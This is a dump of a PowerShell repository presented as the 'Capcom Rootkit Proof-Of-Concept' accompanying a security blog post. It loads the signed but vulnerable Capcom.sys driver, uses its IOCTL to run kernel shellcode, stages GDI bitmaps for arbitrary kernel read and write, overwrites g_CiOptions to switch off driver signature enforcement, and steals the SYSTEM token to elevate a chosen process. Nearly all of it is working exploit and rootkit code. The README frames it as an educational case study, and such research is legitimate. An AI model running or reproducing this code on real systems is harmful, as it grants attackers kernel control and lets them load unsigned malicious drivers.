├── Driver └── Capcom.sys ├── Helpers ├── Bitmap-Write.ps1 ├── Bitmap-Read.ps1 ├── Load-CapcomDriver.ps1 ├── Get-LoadedModules.ps1 └── Stage-gSharedInfoBitmap.ps1 ├── Capcom.psm1 ├── README.md ├── Capcom.psd1 ├── Exploit └── Capcom-StageGDI.ps1 ├── Rootkit ├── Capcom-BypassDriverSigning.ps1 └── Capcom-ElevatePID.ps1 └── Headers └── Capcom_h.ps1 /Driver/Capcom.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FuzzySecurity/Capcom-Rootkit/HEAD/Driver/Capcom.sys -------------------------------------------------------------------------------- /Helpers/Bitmap-Write.ps1: -------------------------------------------------------------------------------- 1 | function Bitmap-Write { 2 | param ($Address, $Value) 3 | 4 | $CallResult = [Capcom]::SetBitmapBits($ManagerBitmap.BitmapHandle, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address)) 5 | $CallResult = [Capcom]::SetBitmapBits($WorkerBitmap.BitmapHandle, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Value)) 6 | } -------------------------------------------------------------------------------- /Capcom.psm1: -------------------------------------------------------------------------------- 1 | # Compatibility for PS v2 / PS v3+ 2 | if(!$PSScriptRoot) { 3 | $Global:PSScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent 4 | } 5 | 6 | # OS version 7 | $OSVersion = [Version](Get-WmiObject Win32_OperatingSystem).Version 8 | [double]$Global:OSMajMin = "$($OSVersion.Major).$($OSVersion.Minor)" 9 | 10 | # Import all modules 11 | Get-ChildItem -Recurse $PSScriptRoot | % { if ($_.FullName -Like "*.ps1") { Import-Module $_.FullName -DisableNameChecking } } -------------------------------------------------------------------------------- /Helpers/Bitmap-Read.ps1: -------------------------------------------------------------------------------- 1 | function Bitmap-Read { 2 | param ($Address) 3 | 4 | $CallResult = [Capcom]::SetBitmapBits($ManagerBitmap.BitmapHandle, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address)) 5 | [IntPtr]$Pointer = [Capcom]::VirtualAlloc([System.IntPtr]::Zero, [System.IntPtr]::Size, 0x3000, 0x40) 6 | $CallResult = [Capcom]::GetBitmapBits($WorkerBitmap.BitmapHandle, [System.IntPtr]::Size, $Pointer) 7 | if ($x32Architecture){ 8 | [System.Runtime.InteropServices.Marshal]::ReadInt32($Pointer) 9 | } else { 10 | [System.Runtime.InteropServices.Marshal]::ReadInt64($Pointer) 11 | } 12 | $CallResult = [Capcom]::VirtualFree($Pointer, [System.IntPtr]::Size, 0x8000) 13 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Capcom Rootkit Proof-Of-Concept 2 | ------------------------------- 3 | 4 | This repository accompanies the "Capcom Rootkit Proof-Of-Concept" blogpost at the URL below: 5 | * http://www.fuzzysecurity.com/tutorials/28.html 6 | 7 | The code provided here and the content of the blogpost are for educational purposes only! This content is a case-study of using, signed, vulnerable drivers to manipulate the Windows Kernel in ways similar to those used by malware in the past. 8 | 9 | Driver Details 10 | -------------- 11 | 12 | # Name 13 | CAPCOM Co.,Ltd. 14 | 15 | # Signing Time 16 | 06 September 2016 05:03:21 17 | 18 | # Valid From 19 | 02 May 2016 00:00:00 20 | 21 | # Valid To 22 | 02 May 2017 23:59:59 23 | 24 | # SHA256 25 | da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24 26 | -------------------------------------------------------------------------------- /Capcom.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | # Script module or binary module file associated with this manifest. 3 | ModuleToProcess = 'Capcom.psm1' 4 | 5 | # Version number of this module. 6 | ModuleVersion = '0.0.0.1' 7 | 8 | # ID used to uniquely identify this module 9 | GUID = 'd34db33f-f3e7-417d-8735-e624dd62e7c8' 10 | 11 | # Author of this module 12 | Author = 'Ruben Boonen' 13 | 14 | # Copyright statement for this module 15 | Copyright = 'BSD 3-Clause' 16 | 17 | # Description of the functionality provided by this module 18 | Description = 'Rootkit POC based on signed Capcom.sys driver!' 19 | 20 | # Minimum version of the Windows PowerShell engine required by this module 21 | PowerShellVersion = '2.0' 22 | 23 | # Architecture is x64 only 24 | ProcessorArchitecture = 'AMD64' 25 | 26 | # Functions to export from this module 27 | FunctionsToExport = @( 28 | 'Capcom-ElevatePID', 29 | 'Capcom-BypassDriverSigning' 30 | ) 31 | } -------------------------------------------------------------------------------- /Helpers/Load-CapcomDriver.ps1: -------------------------------------------------------------------------------- 1 | function Load-CapcomDriver { 2 | param([String]$Path) 3 | 4 | # Driver loading not supported on Win7 5 | if ($OSMajMin -le 6.1) { 6 | Write-Output "[!] Automatic driver loading not supported on this OS!`n" 7 | $Global:DriverNotLoaded = $true 8 | Return 9 | } 10 | 11 | # Check if the user is running as Admin 12 | $IsAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator') 13 | if (!$IsAdmin) { 14 | Write-Output "[!] Administrator privilege is required to create a driver service!`n" 15 | $Global:DriverNotLoaded = $true 16 | Return 17 | } 18 | 19 | if (Get-Service "CapcomRK" -ErrorAction SilentlyContinue) { 20 | if ((Get-Service "CapcomRK").Status -eq "Stopped") { 21 | Start-Service -Name CapcomRK |Out-Null 22 | } 23 | } else { 24 | # Uses SC because New-Service doesn't support "type= kernel" (..?) 25 | IEX $($env:SystemRoot + "\System32\sc.exe create CapcomRK binpath= $Path type= kernel start= demand") |Out-Null 26 | Start-Service -Name CapcomRK |Out-Null 27 | } 28 | 29 | # Check service status 30 | $ServiceStatus = (Get-Service "CapcomRK").Status 31 | if ($ServiceStatus -eq "Running") { 32 | Write-Output "[+] Capcom service started: CapcomRK" 33 | Get-Service "CapcomRK" |fl 34 | } else { 35 | Write-Output "[!] Something went wrong while creating the Capcom service!`n" 36 | $Global:DriverNotLoaded = $true 37 | Return 38 | } 39 | } -------------------------------------------------------------------------------- /Exploit/Capcom-StageGDI.ps1: -------------------------------------------------------------------------------- 1 | function Capcom-StageGDI { 2 | 3 | # Check if the Capcom driver is loaded 4 | $SystemModuleCapcom = Get-LoadedModules |Where-Object {$_.ImageName -Like "*Capcom*"} 5 | if (!$SystemModuleCapcom) { 6 | Write-Output "`n[+] Loading Capcom driver.." 7 | Load-CapcomDriver -Path $($PSScriptRoot + "\..\Driver\Capcom.sys") 8 | if ($DriverNotLoaded -eq $true) { 9 | Return 10 | } 11 | } 12 | 13 | # Leak BitMap pointers 14 | $Global:ManagerBitmap = Stage-gSharedInfoBitmap 15 | $Global:WorkerBitmap = Stage-gSharedInfoBitmap 16 | 17 | # Shellcode buffer 18 | [Byte[]] $Shellcode = @( 19 | 0x48, 0xB8) + [System.BitConverter]::GetBytes($ManagerBitmap.BitmappvScan0) + @( # mov rax,$ManagerBitmap.BitmappvScan0 20 | 0x48, 0xB9) + [System.BitConverter]::GetBytes($WorkerBitmap.BitmappvScan0) + @( # mov rcx,$WorkerBitmap.BitmappvScan0 21 | 0x48, 0x89, 0x08, # mov qword ptr [rax],rcx 22 | 0xC3 # ret 23 | ) 24 | 25 | # Some tricks here 26 | # => cmp [rax-8], rcx 27 | [IntPtr]$Pointer = [Capcom]::VirtualAlloc([System.IntPtr]::Zero, (8 + $Shellcode.Length), 0x3000, 0x40) 28 | $ExploitBuffer = [System.BitConverter]::GetBytes($Pointer.ToInt64()+8) + $Shellcode 29 | [System.Runtime.InteropServices.Marshal]::Copy($ExploitBuffer, 0, $Pointer, (8 + $Shellcode.Length)) 30 | 31 | $hDevice = [Capcom]::CreateFile("\\.\Htsysm72FB", [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero) 32 | 33 | if ($hDevice -eq -1) { 34 | Write-Output "`n[!] Unable to get driver handle..`n" 35 | Return 36 | } 37 | 38 | # IOCTL = 0xAA013044 39 | #--- 40 | $InBuff = [System.BitConverter]::GetBytes($Pointer.ToInt64()+8) 41 | $OutBuff = 0x1234 42 | [Capcom]::DeviceIoControl($hDevice, 0xAA013044, $InBuff, $InBuff.Length, [ref]$OutBuff, 4, [ref]0, [System.IntPtr]::Zero) |Out-null 43 | } -------------------------------------------------------------------------------- /Rootkit/Capcom-BypassDriverSigning.ps1: -------------------------------------------------------------------------------- 1 | function Capcom-DriverSigning { 2 | param ([Int]$SetValue) 3 | 4 | # DSE bypass only supported on Win8+ 5 | if ($OSMajMin -le 6.2) { 6 | Write-Output "[!] Driver signature enforcement bypass not supported on this OS!`n" 7 | Return 8 | } 9 | 10 | # Check our bitmaps have been staged into memory 11 | if (!$ManagerBitmap -Or !$WorkerBitmap) { 12 | Capcom-StageGDI 13 | if ($DriverNotLoaded -eq $true) { 14 | Return 15 | } 16 | } 17 | 18 | # Leak CI base => $SystemModuleCI.ImageBase 19 | $SystemModuleCI = Get-LoadedModules |Where-Object {$_.ImageName -Like "*CI.dll"} 20 | 21 | # We need DONT_RESOLVE_DLL_REFERENCES for CI LoadLibraryEx 22 | $CIHanle = [Capcom]::LoadLibraryEx("ci.dll", [IntPtr]::Zero, 0x1) 23 | $CiInitialize = [Capcom]::GetProcAddress($CIHanle, "CiInitialize") 24 | 25 | # Calculate => CI!CiInitialize 26 | $CiInitializePtr = $CiInitialize.ToInt64() - $CIHanle + $SystemModuleCI.ImageBase 27 | Write-Output "`n[+] CI!CiInitialize: $('{0:X}' -f $CiInitializePtr)" 28 | 29 | # Free CI handle 30 | $CallResult = [Capcom]::FreeLibrary($CIHanle) 31 | 32 | # Calculate => CipInitialize 33 | # jmp CI!CipInitialize 34 | for ($i=0;$i -lt 500;$i++) { 35 | $val = ("{0:X}" -f $(Bitmap-Read -Address $($CiInitializePtr + $i))) -split '(..)' | ? { $_ } 36 | # Look for the first jmp instruction 37 | if ($val[-1] -eq "E9") { 38 | $Distance = [Int]"0x$(($val[-3,-2]) -join '')" 39 | $CipInitialize = $Distance + 5 + $CiInitializePtr + $i 40 | Write-Output "[+] CI!CipInitialize: $('{0:X}' -f $CipInitialize)" 41 | break 42 | } 43 | } 44 | 45 | # Calculate => g_CiOptions 46 | # mov dword ptr [CI!g_CiOptions],ecx 47 | for ($i=0;$i -lt 500;$i++) { 48 | $val = ("{0:X}" -f $(Bitmap-Read -Address $($CipInitialize + $i))) -split '(..)' | ? { $_ } 49 | # Look for the first jmp instruction 50 | if ($val[-1] -eq "89" -And $val[-2] -eq "0D") { 51 | $Distance = [Int]"0x$(($val[-6..-3]) -join '')" 52 | $g_CiOptions = $Distance + 6 + $CipInitialize + $i 53 | Write-Output "[+] CI!g_CiOptions: $('{0:X}' -f $g_CiOptions)" 54 | break 55 | } 56 | } 57 | 58 | # print g_CiOptions 59 | Write-Output "[+] Current CiOptions Value: $('{0:X}' -f $(Bitmap-Read -Address $g_CiOptions))`n" 60 | 61 | if ($SetValue) { 62 | Bitmap-Write -Address $g_CiOptions -Value $SetValue 63 | # print new g_CiOptions 64 | Write-Output "[!] New CiOptions Value: $('{0:X}' -f $(Bitmap-Read -Address $g_CiOptions))`n" 65 | } 66 | } -------------------------------------------------------------------------------- /Helpers/Get-LoadedModules.ps1: -------------------------------------------------------------------------------- 1 | function Get-LoadedModules { 2 | <# 3 | .SYNOPSIS 4 | Use NtQuerySystemInformation::SystemModuleInformation to get a list of 5 | loaded modules, their base address and size (x32/x64). 6 | Note: Low integrity only pre 8.1 7 | .DESCRIPTION 8 | Author: Ruben Boonen (@FuzzySec) 9 | License: BSD 3-Clause 10 | Required Dependencies: None 11 | Optional Dependencies: None 12 | .EXAMPLE 13 | C:\PS> $Modules = Get-LoadedModules 14 | C:\PS> $KernelBase = $Modules[0].ImageBase 15 | C:\PS> $KernelType = ($Modules[0].ImageName -split "\\")[-1] 16 | C:\PS> ...... 17 | #> 18 | 19 | [int]$BuffPtr_Size = 0 20 | while ($true) { 21 | [IntPtr]$BuffPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($BuffPtr_Size) 22 | $SystemInformationLength = New-Object Int 23 | 24 | # SystemModuleInformation Class = 11 25 | $CallResult = [Capcom]::NtQuerySystemInformation(11, $BuffPtr, $BuffPtr_Size, [ref]$SystemInformationLength) 26 | 27 | # STATUS_INFO_LENGTH_MISMATCH 28 | if ($CallResult -eq 0xC0000004) { 29 | [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr) 30 | [int]$BuffPtr_Size = [System.Math]::Max($BuffPtr_Size,$SystemInformationLength) 31 | } 32 | # STATUS_SUCCESS 33 | elseif ($CallResult -eq 0x00000000) { 34 | break 35 | } 36 | # Probably: 0xC0000005 -> STATUS_ACCESS_VIOLATION 37 | else { 38 | [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr) 39 | return 40 | } 41 | } 42 | 43 | $SYSTEM_MODULE_INFORMATION = New-Object SYSTEM_MODULE_INFORMATION 44 | $SYSTEM_MODULE_INFORMATION = $SYSTEM_MODULE_INFORMATION.GetType() 45 | if ([System.IntPtr]::Size -eq 4) { 46 | $SYSTEM_MODULE_INFORMATION_Size = 284 47 | } else { 48 | $SYSTEM_MODULE_INFORMATION_Size = 296 49 | } 50 | 51 | $BuffOffset = $BuffPtr.ToInt64() 52 | $HandleCount = [System.Runtime.InteropServices.Marshal]::ReadInt32($BuffOffset) 53 | $BuffOffset = $BuffOffset + [System.IntPtr]::Size 54 | 55 | $SystemModuleArray = @() 56 | for ($i=0; $i -lt $HandleCount; $i++){ 57 | $SystemPointer = New-Object System.Intptr -ArgumentList $BuffOffset 58 | $Cast = [system.runtime.interopservices.marshal]::PtrToStructure($SystemPointer,[type]$SYSTEM_MODULE_INFORMATION) 59 | 60 | $HashTable = @{ 61 | ImageName = $Cast.ImageName 62 | ImageBase = if ([System.IntPtr]::Size -eq 4) {$($Cast.ImageBase).ToInt32()} else {$($Cast.ImageBase).ToInt64()} 63 | ImageSize = "0x$('{0:X}' -f $Cast.ImageSize)" 64 | } 65 | 66 | $Object = New-Object PSObject -Property $HashTable 67 | $SystemModuleArray += $Object 68 | 69 | $BuffOffset = $BuffOffset + $SYSTEM_MODULE_INFORMATION_Size 70 | } 71 | 72 | $SystemModuleArray 73 | 74 | # Free SystemModuleInformation array 75 | [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr) 76 | } -------------------------------------------------------------------------------- /Rootkit/Capcom-ElevatePID.ps1: -------------------------------------------------------------------------------- 1 | function Capcom-ElevatePID { 2 | param ([Int]$ProcPID) 3 | 4 | # Check our bitmaps have been staged into memory 5 | if (!$ManagerBitmap -Or !$WorkerBitmap) { 6 | Capcom-StageGDI 7 | if ($DriverNotLoaded -eq $true) { 8 | Return 9 | } 10 | } 11 | 12 | # Defaults to elevating Powershell 13 | if (!$ProcPID) { 14 | $ProcPID = $PID 15 | } 16 | 17 | # Make sure the pid exists! 18 | # 0 is also invalid but will default to $PID 19 | $IsValidProc = ((Get-Process).Id).Contains($ProcPID) 20 | if (!$IsValidProc) { 21 | Write-Output "`n[!] Invalid process specified!`n" 22 | Return 23 | } 24 | 25 | # _EPROCESS UniqueProcessId/Token/ActiveProcessLinks offsets based on OS 26 | # WARNING offsets are invalid for Pre-RTM images! 27 | $OSVersion = [Version](Get-WmiObject Win32_OperatingSystem).Version 28 | $OSMajorMinor = "$($OSVersion.Major).$($OSVersion.Minor)" 29 | switch ($OSMajorMinor) 30 | { 31 | '10.0' # Win10 / 2k16 32 | { 33 | $UniqueProcessIdOffset = 0x2e8 34 | $TokenOffset = 0x358 35 | $ActiveProcessLinks = 0x2f0 36 | } 37 | 38 | '6.3' # Win8.1 / 2k12R2 39 | { 40 | $UniqueProcessIdOffset = 0x2e0 41 | $TokenOffset = 0x348 42 | $ActiveProcessLinks = 0x2e8 43 | } 44 | 45 | '6.2' # Win8 / 2k12 46 | { 47 | $UniqueProcessIdOffset = 0x2e0 48 | $TokenOffset = 0x348 49 | $ActiveProcessLinks = 0x2e8 50 | } 51 | 52 | '6.1' # Win7 / 2k8R2 53 | { 54 | $UniqueProcessIdOffset = 0x180 55 | $TokenOffset = 0x208 56 | $ActiveProcessLinks = 0x188 57 | } 58 | } 59 | 60 | # Get EPROCESS entry for System process 61 | $SystemModuleArray = Get-LoadedModules 62 | $KernelBase = $SystemModuleArray[0].ImageBase 63 | $KernelType = ($SystemModuleArray[0].ImageName -split "\\")[-1] 64 | $KernelHanle = [Capcom]::LoadLibrary("$KernelType") 65 | $PsInitialSystemProcess = [Capcom]::GetProcAddress($KernelHanle, "PsInitialSystemProcess") 66 | $SysEprocessPtr = $PsInitialSystemProcess.ToInt64() - $KernelHanle + $KernelBase 67 | $CallResult = [Capcom]::FreeLibrary($KernelHanle) 68 | $SysEPROCESS = Bitmap-Read -Address $SysEprocessPtr 69 | $SysToken = Bitmap-Read -Address $($SysEPROCESS+$TokenOffset) 70 | Write-Output "`n[+] SYSTEM Token: 0x$("{0:X}" -f $SysToken)" 71 | 72 | # Get EPROCESS entry for PID 73 | $NextProcess = $(Bitmap-Read -Address $($SysEPROCESS+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size 74 | while($true) { 75 | $NextPID = Bitmap-Read -Address $($NextProcess+$UniqueProcessIdOffset) 76 | if ($NextPID -eq $ProcPID) { 77 | $TargetTokenAddr = $NextProcess+$TokenOffset 78 | Write-Output "[+] Found PID: $NextPID" 79 | Write-Output "[+] PID token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($NextProcess+$TokenOffset)))" 80 | break 81 | } 82 | $NextProcess = $(Bitmap-Read -Address $($NextProcess+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size 83 | } 84 | 85 | # Duplicate token! 86 | Write-Output "[!] Duplicating SYSTEM token!`n" 87 | Bitmap-Write -Address $TargetTokenAddr -Value $SysToken 88 | } -------------------------------------------------------------------------------- /Helpers/Stage-gSharedInfoBitmap.ps1: -------------------------------------------------------------------------------- 1 | function Stage-gSharedInfoBitmap { 2 | <# 3 | .SYNOPSIS 4 | Universal Bitmap leak using accelerator tables, 32/64 bit Win7-10 (post anniversary). 5 | .DESCRIPTION 6 | Author: Ruben Boonen (@FuzzySec) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | Optional Dependencies: None 10 | .EXAMPLE 11 | PS C:\Users\b33f> Stage-gSharedInfoBitmap |fl 12 | 13 | BitmapKernelObj : -7692235059200 14 | BitmappvScan0 : -7692235059120 15 | BitmapHandle : 1845828432 16 | 17 | PS C:\Users\b33f> $Manager = Stage-gSharedInfoBitmap 18 | PS C:\Users\b33f> "{0:X}" -f $Manager.BitmapKernelObj 19 | FFFFF901030FF000 20 | #> 21 | 22 | # Check Arch 23 | if ([System.IntPtr]::Size -eq 4) { 24 | $x32 = 1 25 | } 26 | 27 | function Create-AcceleratorTable { 28 | [IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(10000) 29 | $AccelHandle = [Capcom]::CreateAcceleratorTable($Buffer, 700) # +4 kb size 30 | $User32Hanle = [Capcom]::LoadLibrary("user32.dll") 31 | $gSharedInfo = [Capcom]::GetProcAddress($User32Hanle, "gSharedInfo") 32 | if ($x32){ 33 | $gSharedInfo = $gSharedInfo.ToInt32() 34 | } else { 35 | $gSharedInfo = $gSharedInfo.ToInt64() 36 | } 37 | $aheList = $gSharedInfo + [System.IntPtr]::Size 38 | if ($x32){ 39 | $aheList = [System.Runtime.InteropServices.Marshal]::ReadInt32($aheList) 40 | $HandleEntry = $aheList + ([int]$AccelHandle -band 0xffff)*0xc # _HANDLEENTRY.Size = 0xC 41 | $phead = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleEntry) 42 | } else { 43 | $aheList = [System.Runtime.InteropServices.Marshal]::ReadInt64($aheList) 44 | $HandleEntry = $aheList + ([int]$AccelHandle -band 0xffff)*0x18 # _HANDLEENTRY.Size = 0x18 45 | $phead = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleEntry) 46 | } 47 | 48 | $Result = @() 49 | $HashTable = @{ 50 | Handle = $AccelHandle 51 | KernelObj = $phead 52 | } 53 | $Object = New-Object PSObject -Property $HashTable 54 | $Result += $Object 55 | $Result 56 | } 57 | 58 | function Destroy-AcceleratorTable { 59 | param ($Hanlde) 60 | $CallResult = [Capcom]::DestroyAcceleratorTable($Hanlde) 61 | } 62 | 63 | $KernelArray = @() 64 | for ($i=0;$i -lt 20;$i++) { 65 | $KernelArray += Create-AcceleratorTable 66 | if ($KernelArray.Length -gt 1) { 67 | if ($KernelArray[$i].KernelObj -eq $KernelArray[$i-1].KernelObj) { 68 | Destroy-AcceleratorTable -Hanlde $KernelArray[$i].Handle 69 | [IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x50*2*4) 70 | $BitmapHandle = [Capcom]::CreateBitmap(0x701, 2, 1, 8, $Buffer) # # +4 kb size -lt AcceleratorTable 71 | break 72 | } 73 | } 74 | Destroy-AcceleratorTable -Hanlde $KernelArray[$i].Handle 75 | } 76 | 77 | $BitMapObject = @() 78 | $HashTable = @{ 79 | BitmapHandle = $BitmapHandle 80 | BitmapKernelObj = $($KernelArray[$i].KernelObj) 81 | BitmappvScan0 = if ($x32) {$($KernelArray[$i].KernelObj) + 0x32} else {$($KernelArray[$i].KernelObj) + 0x50} 82 | } 83 | $Object = New-Object PSObject -Property $HashTable 84 | $BitMapObject += $Object 85 | $BitMapObject 86 | } -------------------------------------------------------------------------------- /Headers/Capcom_h.ps1: -------------------------------------------------------------------------------- 1 | Add-Type -TypeDefinition @" 2 | using System; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | using System.Security.Principal; 6 | 7 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 8 | public struct SYSTEM_MODULE_INFORMATION 9 | { 10 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)] 11 | public UIntPtr[] Reserved; 12 | public IntPtr ImageBase; 13 | public UInt32 ImageSize; 14 | public UInt32 Flags; 15 | public UInt16 LoadOrderIndex; 16 | public UInt16 InitOrderIndex; 17 | public UInt16 LoadCount; 18 | public UInt16 ModuleNameOffset; 19 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 256)] 20 | internal Char[] _ImageName; 21 | public String ImageName { 22 | get { 23 | return new String(_ImageName).Split(new Char[] {'\0'}, 2)[0]; 24 | } 25 | } 26 | } 27 | 28 | public static class Capcom 29 | { 30 | [DllImport("kernel32.dll", SetLastError = true)] 31 | public static extern IntPtr VirtualAlloc( 32 | IntPtr lpAddress, 33 | uint dwSize, 34 | UInt32 flAllocationType, 35 | UInt32 flProtect); 36 | 37 | [DllImport("kernel32.dll", SetLastError=true)] 38 | public static extern bool VirtualFree( 39 | IntPtr lpAddress, 40 | uint dwSize, 41 | uint dwFreeType); 42 | 43 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 44 | public static extern IntPtr CreateFile( 45 | String lpFileName, 46 | UInt32 dwDesiredAccess, 47 | UInt32 dwShareMode, 48 | IntPtr lpSecurityAttributes, 49 | UInt32 dwCreationDisposition, 50 | UInt32 dwFlagsAndAttributes, 51 | IntPtr hTemplateFile); 52 | 53 | [DllImport("Kernel32.dll", SetLastError = true)] 54 | public static extern bool DeviceIoControl( 55 | IntPtr hDevice, 56 | int IoControlCode, 57 | byte[] InBuffer, 58 | int nInBufferSize, 59 | ref IntPtr OutBuffer, 60 | int nOutBufferSize, 61 | ref int pBytesReturned, 62 | IntPtr Overlapped); 63 | 64 | [DllImport("gdi32.dll")] 65 | public static extern IntPtr CreateBitmap( 66 | int nWidth, 67 | int nHeight, 68 | uint cPlanes, 69 | uint cBitsPerPel, 70 | IntPtr lpvBits); 71 | 72 | [DllImport("gdi32.dll")] 73 | public static extern int SetBitmapBits( 74 | IntPtr hbmp, 75 | uint cBytes, 76 | byte[] lpBits); 77 | 78 | [DllImport("gdi32.dll")] 79 | public static extern int GetBitmapBits( 80 | IntPtr hbmp, 81 | int cbBuffer, 82 | IntPtr lpvBits); 83 | 84 | [DllImport("ntdll.dll")] 85 | public static extern int NtQuerySystemInformation( 86 | int SystemInformationClass, 87 | IntPtr SystemInformation, 88 | int SystemInformationLength, 89 | ref int ReturnLength); 90 | 91 | [DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)] 92 | public static extern IntPtr LoadLibrary( 93 | string lpFileName); 94 | 95 | [DllImport("kernel32", SetLastError=true)] 96 | public static extern IntPtr LoadLibraryEx( 97 | string lpFileName, 98 | IntPtr hReservedNull, 99 | int dwFlags); 100 | 101 | [DllImport("kernel32.dll", SetLastError=true)] 102 | public static extern bool FreeLibrary( 103 | IntPtr hModule); 104 | 105 | [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)] 106 | public static extern IntPtr GetProcAddress( 107 | IntPtr hModule, 108 | string procName); 109 | 110 | [DllImport("user32.dll")] 111 | public static extern IntPtr CreateAcceleratorTable( 112 | IntPtr lpaccl, 113 | int cEntries); 114 | 115 | [DllImport("user32.dll")] 116 | public static extern bool DestroyAcceleratorTable( 117 | IntPtr hAccel); 118 | } 119 | "@ --------------------------------------------------------------------------------